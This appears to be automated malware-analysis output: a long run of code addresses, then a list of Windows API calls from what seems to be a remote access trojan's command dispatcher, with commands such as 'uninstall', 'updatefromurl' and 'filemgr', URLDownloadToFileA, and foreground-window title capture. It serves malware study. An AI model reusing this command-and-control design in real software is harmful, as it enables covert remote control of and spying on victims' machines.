                                          0x0040bb20
                                          0x0040bb2a
                                          0x0040bb2c
                                          0x0040bb32
                                          0x0040bb38
                                          0x0040bb3a
                                          0x0040bb3c
                                          0x0040bb3c
                                          0x0040bb44
                                          0x0040bb49
                                          0x0040bb4a
                                          0x0040bb4f
                                          0x0040bb54
                                          0x0040bb55
                                          0x0040bb5d
                                          0x0040bb5f
                                          0x0040bb6c
                                          0x0040b73d
                                          0x0040b73d
                                          0x00000000
                                          0x0040b73d
                                          0x0040ba46
                                          0x0040ba49
                                          0x0040ba4c
                                          0x0040bae0
                                          0x0040bae3
                                          0x0040bae6
                                          0x0040bb85
                                          0x0040bb88
                                          0x0040bbb3
                                          0x0040bbb6
                                          0x0040bc0c
                                          0x0040bc0f
                                          0x0040bc24
                                          0x0040bc27
                                          0x0040bc52
                                          0x0040bc55
                                          0x00000000
                                          0x00000000
                                          0x0040bc5c
                                          0x0040bc67
                                          0x0040bc6d
                                          0x0040bc72
                                          0x00000000
                                          0x0040bc72
                                          0x0040bc2e
                                          0x0040bc39
                                          0x0040bc3f
                                          0x00000000
                                          0x0040bc3f
                                          0x0040bc11
                                          0x00000000
                                          0x0040bc11
                                          0x0040bbb8
                                          0x0040bbbc
                                          0x0040bbcd
                                          0x0040bbd4
                                          0x0040bbda
                                          0x0040bbdb
                                          0x0040bbe3
                                          0x0040bbe5
                                          0x00000000
                                          0x00000000
                                          0x0040bbf6
                                          0x0040b8e5
                                          0x0040b8e6
                                          0x00000000
                                          0x0040b8e6
                                          0x0040bb8f
                                          0x0040bb96
                                          0x0040bb9d
                                          0x00000000
                                          0x0040bb9d
                                          0x0040baee
                                          0x0040baf4
                                          0x0040baf6
                                          0x00000000
                                          0x00000000
                                          0x0040bafc
                                          0x0040bb02
                                          0x0040bb02
                                          0x00000000
                                          0x0040bb02
                                          0x0040ba5a
                                          0x0040ba5c
                                          0x00000000
                                          0x00000000
                                          0x0040ba62
                                          0x0040ba6d
                                          0x0040ba74
                                          0x0040ba87
                                          0x0040ba95
                                          0x0040ba98
                                          0x0040ba9f
                                          0x0040baad
                                          0x0040baaf
                                          0x0040bab5
                                          0x0040baba
                                          0x0040bac4
                                          0x0040bac4
                                          0x0040bac6
                                          0x0040bacf
                                          0x00000000
                                          0x0040bacf
                                          0x0040b964
                                          0x0040b970
                                          0x0040b97e
                                          0x0040b981
                                          0x0040b99b
                                          0x0040b99e
                                          0x0040b9b5
                                          0x0040b9b8
                                          0x0040b9bb
                                          0x0040b9ca
                                          0x0040b9ca
                                          0x0040b9cc
                                          0x0040b9dd
                                          0x0040b9ec
                                          0x0040b9f8
                                          0x0040b9fb
                                          0x0040ba17
                                          0x0040ba1a
                                          0x0040ba1d
                                          0x00000000
                                          0x00000000
                                          0x0040ba23
                                          0x0040ba24
                                          0x0040ba25
                                          0x0040ba00
                                          0x0040ba00
                                          0x00000000
                                          0x0040ba00
                                          0x0040b9fd
                                          0x0040b9fe
                                          0x0040b9ff
                                          0x00000000
                                          0x0040b9ff
                                          0x0040b9bd
                                          0x0040b9bd
                                          0x0040b9bf
                                          0x0040b9c0
                                          0x0040b9c2
                                          0x0040b9c2
                                          0x00000000
                                          0x0040b9c2
                                          0x0040b9a0
                                          0x0040b9a2
                                          0x0040b9a3
                                          0x00000000
                                          0x0040b9a3
                                          0x0040b983
                                          0x0040b985
                                          0x0040b986
                                          0x00000000
                                          0x0040b986
                                          0x0040b902
                                          0x0040b909
                                          0x0040b910
                                          0x0040b919
                                          0x0040b920
                                          0x0040b927
                                          0x0040b930
                                          0x0040b937
                                          0x0040b942
                                          0x00000000
                                          0x0040b947
                                          0x0040b8cf
                                          0x0040b8d6
                                          0x0040b8e0
                                          0x00000000
                                          0x0040b8e0
                                          0x0040b86f
                                          0x0040b876
                                          0x0040b87d
                                          0x0040b88b
                                          0x0040b892
                                          0x0040b89e
                                          0x0040b8a5
                                          0x0040b8ae
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040b75d
                                          0x0040b75d
                                          0x0040b75d
                                          0x0040b764
                                          0x00000000
                                          0x00000000
                                          0x0040b768
                                          0x0040b768
                                          0x0040b789
                                          0x0040b794
                                          0x0040b79b
                                          0x0040b79f
                                          0x0040b7a8
                                          0x0040b7ac
                                          0x0040b7b7
                                          0x0040b7c0
                                          0x0040b7cd
                                          0x0040b7da
                                          0x0040b7e6
                                          0x0040b7ec
                                          0x0040b7ee
                                          0x0040b7f5
                                          0x0040b7fc
                                          0x0040b808
                                          0x0040b80f
                                          0x0040b81c
                                          0x0040b828
                                          0x0040b837
                                          0x0040b83d
                                          0x0040b842
                                          0x0040b84b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040b68f
                                          0x0040b68f
                                          0x0040b68f
                                          0x0040b696
                                          0x00000000
                                          0x00000000
                                          0x0040b69a
                                          0x0040b69a
                                          0x0040b6bb
                                          0x0040b6c6
                                          0x0040b6cd
                                          0x0040b6d1
                                          0x0040b6da
                                          0x0040b6de
                                          0x0040b6e9
                                          0x0040b6f2
                                          0x0040b6ff
                                          0x0040b70b
                                          0x0040b712
                                          0x0040b718
                                          0x0040b719
                                          0x0040b71a
                                          0x0040b71f
                                          0x0040b721
                                          0x0040b72c
                                          0x0040b732
                                          0x0040b737
                                          0x00000000
                                          0x0040b65d
                                          0x0040b65d
                                          0x0040b65d
                                          0x0040b664
                                          0x00000000
                                          0x00000000
                                          0x0040b668
                                          0x0040b668
                                          0x0040b670
                                          0x0040bc75
                                          0x0040bc78
                                          0x00000000
                                          0x0040bc78
                                          0x0040b65b
                                          0x0040b61a
                                          0x0040b621
                                          0x0040b628
                                          0x00000000
                                          0x0040b628
                                          0x0040b585
                                          0x0040b597
                                          0x0040b5ad
                                          0x0040b5c3
                                          0x0040b5d9
                                          0x0040b5ef
                                          0x0040b5f5
                                          0x0040b5fa
                                          0x0040b5fd
                                          0x0040b5fd
                                          0x0040b5fd
                                          0x00000000
                                          0x0040b5fd
                                          0x0040b54d
                                          0x0040b554
                                          0x0040b560
                                          0x00000000
                                          0x0040b560
                                          0x0040b4dd
                                          0x0040b4e9
                                          0x0040b4f0
                                          0x0040b4f7
                                          0x0040b500
                                          0x0040b507
                                          0x0040b50e
                                          0x0040b517
                                          0x0040b51e
                                          0x0040b529
                                          0x0040b52e
                                          0x00000000
                                          0x0040b52e
                                          0x0040b4bc
                                          0x0040b4c2
                                          0x0040ae42
                                          0x0040ae42
                                          0x00000000
                                          0x0040ae42
                                          0x0040b3e3
                                          0x0040b3ee
                                          0x0040b3f9
                                          0x0040b3fe
                                          0x0040b40d
                                          0x0040b40e
                                          0x0040b40f
                                          0x0040b410
                                          0x0040b411
                                          0x0040b416
                                          0x0040b41d
                                          0x0040b45b
                                          0x0040b460
                                          0x0040b465
                                          0x0040b46a
                                          0x0040b46f
                                          0x0040b470
                                          0x0040b478
                                          0x0040b47a
                                          0x0040b47f
                                          0x0040b487
                                          0x0040b41f
                                          0x0040b422
                                          0x0040b427
                                          0x0040b42c
                                          0x0040b431
                                          0x0040b436
                                          0x0040b437
                                          0x0040b43f
                                          0x0040b441
                                          0x0040b446
                                          0x0040b44e
                                          0x0040b453
                                          0x0040b48f
                                          0x0040b4a1
                                          0x0040abc7
                                          0x00000000
                                          0x0040abc7
                                          0x0040b141
                                          0x0040b14a
                                          0x0040b153
                                          0x0040b157
                                          0x0040b15c
                                          0x0040b162
                                          0x0040b16f
                                          0x0040b17c
                                          0x0040b188
                                          0x0040b18e
                                          0x0040b190
                                          0x0040b19d
                                          0x0040b1a3
                                          0x0040b1ad
                                          0x0040b1b7
                                          0x0040b1be
                                          0x0040b1be
                                          0x0040b1c6
                                          0x0040b1cc
                                          0x0040b1d2
                                          0x0040b1de
                                          0x0040b1f7
                                          0x0040b203
                                          0x0040b210
                                          0x0040b217
                                          0x0040b21d
                                          0x0040b220
                                          0x0040b279
                                          0x0040b283
                                          0x0040b28d
                                          0x0040b222
                                          0x0040b229
                                          0x0040b232
                                          0x0040b23f
                                          0x0040b264
                                          0x0040b26a
                                          0x0040b296
                                          0x0040b29d
                                          0x0040b2ad
                                          0x0040b2d8
                                          0x0040b2e4
                                          0x0040b2ed
                                          0x0040b2f4
                                          0x0040b2fd
                                          0x0040b304
                                          0x0040b30d
                                          0x0040b314
                                          0x0040b31d
                                          0x0040b324
                                          0x0040b331
                                          0x0040b33e
                                          0x0040b348
                                          0x0040b350
                                          0x0040b355
                                          0x0040b35b
                                          0x0040b364
                                          0x0040b370
                                          0x0040b37c
                                          0x0040b388
                                          0x0040b394
                                          0x0040b3a0
                                          0x0040b3a9
                                          0x0040b3af
                                          0x0040b3bb
                                          0x0040aa43
                                          0x0040aa43
                                          0x00000000
                                          0x0040aa43
                                          0x0040afce
                                          0x0040afd3
                                          0x0040afe0
                                          0x0040afed
                                          0x0040aff7
                                          0x0040b006
                                          0x0040b010
                                          0x0040b017
                                          0x0040b01e
                                          0x0040b025
                                          0x0040b02b
                                          0x0040b02f
                                          0x0040b05d
                                          0x0040b06d
                                          0x0040b06f
                                          0x00000000
                                          0x00000000
                                          0x0040b07a
                                          0x0040b084
                                          0x0040b08b
                                          0x0040b092
                                          0x0040b099
                                          0x0040b09f
                                          0x0040b0a3
                                          0x00000000
                                          0x00000000
                                          0x0040b0ac
                                          0x0040b0b8
                                          0x0040b0c2
                                          0x0040b057
                                          0x0040b057
                                          0x0040b057
                                          0x0040b0cd
                                          0x0040b0d7
                                          0x0040b0e0
                                          0x0040b0e3
                                          0x0040b0f0
                                          0x0040b0f5
                                          0x0040b0fd
                                          0x0040b105
                                          0x0040b10e
                                          0x00000000
                                          0x0040b114
                                          0x0040b038
                                          0x0040b044
                                          0x0040b04e
                                          0x00000000
                                          0x0040b054
                                          0x0040af90
                                          0x0040af97
                                          0x00000000
                                          0x00000000
                                          0x0040afa1
                                          0x0040abfe
                                          0x00000000
                                          0x0040abff
                                          0x0040af75
                                          0x00000000
                                          0x0040af75
                                          0x0040af36
                                          0x0040af48
                                          0x0040af4e
                                          0x0040af55
                                          0x00000000
                                          0x0040af55
                                          0x0040af09
                                          0x0040af0f
                                          0x0040af16
                                          0x00000000
                                          0x0040af16
                                          0x0040aede
                                          0x00000000
                                          0x0040aede
                                          0x0040aebe
                                          0x00000000
                                          0x0040aebe
                                          0x0040ae5d
                                          0x0040ae66
                                          0x0040ae67
                                          0x0040ae6c
                                          0x0040ae72
                                          0x0040ae7a
                                          0x0040ae7e
                                          0x0040ae7f
                                          0x0040ae80
                                          0x0040ae83
                                          0x0040ae84
                                          0x0040ae8c
                                          0x0040ae8e
                                          0x0040ae93
                                          0x0040ae9b
                                          0x0040abc1
                                          0x0040abc1
                                          0x00000000
                                          0x0040abc1
                                          0x0040ae3d
                                          0x00000000
                                          0x0040ae3d
                                          0x0040ae0c
                                          0x0040ae0e
                                          0x0040ae11
                                          0x0040ae18
                                          0x0040ae22
                                          0x00000000
                                          0x0040ae22
                                          0x0040adce
                                          0x0040add5
                                          0x0040addc
                                          0x0040addc
                                          0x0040adf1
                                          0x0040adf7
                                          0x00000000
                                          0x0040adf7
                                          0x0040ad9e
                                          0x0040ada5
                                          0x0040adb2
                                          0x00000000
                                          0x0040adb2
                                          0x0040ad24
                                          0x0040ad29
                                          0x0040ad2f
                                          0x0040ad39
                                          0x0040ad46
                                          0x0040ad4f
                                          0x0040ad52
                                          0x0040ad5f
                                          0x0040ad64
                                          0x0040ad6c
                                          0x0040ad74
                                          0x00000000
                                          0x0040ad7a
                                          0x0040acf5
                                          0x0040acfc
                                          0x0040ad03
                                          0x00000000
                                          0x0040ad03
                                          0x0040acb7
                                          0x0040acbe
                                          0x0040acc9
                                          0x0040acd2
                                          0x00000000
                                          0x0040acd7
                                          0x0040ac99
                                          0x0040ac66
                                          0x0040ac6b
                                          0x0040ac72
                                          0x0040ac7d
                                          0x00000000
                                          0x0040ac7d
                                          0x0040ac64
                                          0x00000000
                                          0x0040ac64
                                          0x0040ac36
                                          0x0040ac3d
                                          0x0040ac48
                                          0x00000000
                                          0x0040ac48
                                          0x0040ac16
                                          0x0040ac16
                                          0x00000000
                                          0x0040ac16
                                          0x0040abe8
                                          0x0040abef
                                          0x0040abf9
                                          0x00000000
                                          0x0040abf9
                                          0x0040ab3e
                                          0x0040ab5b
                                          0x0040ab67
                                          0x0040ab70
                                          0x0040ab74
                                          0x0040ab7d
                                          0x0040ab81
                                          0x0040ab8b
                                          0x0040ab90
                                          0x0040ab98
                                          0x0040aba0
                                          0x0040aba9
                                          0x0040abb5
                                          0x00000000
                                          0x0040abbb
                                          0x0040aa68
                                          0x0040aa6f
                                          0x0040aa7c
                                          0x0040aa81
                                          0x0040aa8b
                                          0x0040aa98
                                          0x0040aaa4
                                          0x0040aaaa
                                          0x0040aaac
                                          0x0040aab3
                                          0x0040aaba
                                          0x0040aac6
                                          0x0040aacd
                                          0x0040aada
                                          0x0040aae6
                                          0x0040aaec
                                          0x0040aaf5
                                          0x0040ab02
                                          0x0040ab02
                                          0x0040ab0e
                                          0x00000000
                                          0x0040ab14
                                          0x0040a9e3
                                          0x0040a9ea
                                          0x0040a9f7
                                          0x0040a9fc
                                          0x0040a9ff
                                          0x0040aa06
                                          0x0040aa12
                                          0x0040aa19
                                          0x0040aa21
                                          0x0040aa2d
                                          0x0040aa3a
                                          0x00000000
                                          0x0040aa40
                                          0x0040a9af
                                          0x0040a9ba
                                          0x0040a9c0
                                          0x0040a9c5
                                          0x00000000
                                          0x0040a9c5
                                          0x0040a990
                                          0x0040a992
                                          0x0040a975
                                          0x0040a975
                                          0x00000000
                                          0x0040a975
                                          0x0040a7c8
                                          0x0040a810
                                          0x0040a81c
                                          0x0040a825
                                          0x0040a82c
                                          0x0040a835
                                          0x0040a83c
                                          0x0040a845
                                          0x0040a84c
                                          0x0040a855
                                          0x0040a85c
                                          0x0040a865
                                          0x0040a869
                                          0x0040a872
                                          0x0040a876
                                          0x0040a880
                                          0x0040a88a
                                          0x0040a88f
                                          0x0040a897
                                          0x0040a8a0
                                          0x0040a8ac
                                          0x0040a8b8
                                          0x0040a8c4
                                          0x0040a8d0
                                          0x0040a8dc
                                          0x0040a8e8
                                          0x0040a8f4
                                          0x0040a8fd
                                          0x0040a906
                                          0x0040a911
                                          0x0040a918
                                          0x0040a925
                                          0x0040a92a
                                          0x0040a968
                                          0x0040a96b
                                          0x00000000
                                          0x00000000
                                          0x0040a971
                                          0x0040a973
                                          0x00000000
                                          0x0040a973
                                          0x0040a930
                                          0x0040a933
                                          0x0040a938
                                          0x0040a93f
                                          0x0040a94b
                                          0x0040a941
                                          0x0040a941
                                          0x0040a941
                                          0x00000000

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040A737
                                          • SetEvent.KERNEL32(?), ref: 0040A740
                                          • CloseHandle.KERNEL32(?), ref: 0040A749
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00415268), ref: 0040A75A
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040A766
                                            • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFC4
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFDB
                                            • Part of subcall function 0040EFB5: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491), ref: 0040EFF1
                                            • Part of subcall function 0040EFB5: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040F00F
                                            • Part of subcall function 0040EFB5: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F019
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F022
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F037
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F044
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F096
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F09F
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F0A8
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040A796
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,ping), ref: 0040A7AB
                                          • GetTickCount.KERNEL32 ref: 0040A7BD
                                            • Part of subcall function 0040ED35: _itoa.MSVCRT ref: 0040ED53
                                            • Part of subcall function 0040ED35: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040A186,?,00000000), ref: 0040ED67
                                            • Part of subcall function 0040E898: GetLastInputInfo.USER32(00000000), ref: 0040E8A8
                                            • Part of subcall function 0040E898: GetTickCount.KERNEL32 ref: 0040E8AE
                                            • Part of subcall function 0040E85D: GetForegroundWindow.USER32 ref: 0040E866
                                            • Part of subcall function 0040E85D: GetWindowTextW.USER32 ref: 0040E879
                                            • Part of subcall function 0040E85D: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0040E88D
                                            • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDE3
                                            • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004118A0,00000000,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDF4
                                            • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDFD
                                            • Part of subcall function 0040EDD3: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE0A
                                            • Part of subcall function 0040EDD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE15
                                            • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(hRA,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE34
                                            • Part of subcall function 0040EDD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE3D
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,pong,00415268,00000000,00000001,00415268,00000000,00000000,?,?,?,00000000), ref: 0040A81C
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,00415268,00000000,00000000,?,?,?,00000000), ref: 0040A82C
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,00000000,00000000,?,?,?,00000000), ref: 0040A83C
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,00000000,00000000,?,?,?,00000000), ref: 0040A84C
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00415268,00000000,00000000), ref: 0040A85C
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 0040A869
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A876
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A897
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8A0
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8AC
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8B8
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8C4
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8D0
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8DC
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8E8
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8F4
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8FD
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A906
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002), ref: 0040A918
                                          • atoi.MSVCRT ref: 0040A925
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000001,00410844), ref: 0040A965
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,filemgr), ref: 0040A9A2
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040A9BA
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,close), ref: 0040B63C
                                          • exit.MSVCRT ref: 0040B646
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,uninstall), ref: 0040B655
                                          • Sleep.KERNEL32(00000064), ref: 0040B668
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,updatefromurl), ref: 0040B683
                                          • Sleep.KERNEL32(00000064), ref: 0040B69A
                                          • getenv.MSVCRT ref: 0040B6BB
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040B6C6
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040B6D1
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B6DE
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B6E9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B6F2
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000), ref: 0040B6FF
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040B712
                                          • URLDownloadToFileA.URLMON(00000000,00000000), ref: 0040B71A
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040B72C
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B73D
                                            • Part of subcall function 004026F2: GetLocalTime.KERNEL32(?,758EFF80,00415A30,?,?,?,?,?,?,?,?,?,?,?,0040A946,?), ref: 0040271B
                                            • Part of subcall function 004026F2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [KeepAlive] ,?,Timeout changed to %i,?,?,0040A946,?,?), ref: 00402747
                                            • Part of subcall function 004026F2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0040A946,?), ref: 00402752
                                            • Part of subcall function 004026F2: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040A946,?), ref: 0040275C
                                            • Part of subcall function 004026F2: printf.MSVCRT ref: 00402763
                                            • Part of subcall function 004026F2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040276F
                                            • Part of subcall function 004026F2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402778
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,updatefromlocal), ref: 0040B751
                                          • Sleep.KERNEL32(00000064), ref: 0040B768
                                          • getenv.MSVCRT ref: 0040B789
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040B794
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040B79F
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B7AC
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B7B7
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B7C0
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000032,00000001), ref: 0040B7CD
                                          • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040B7DA
                                          • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040B7E6
                                          • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000002), ref: 0040B7FC
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040B80F
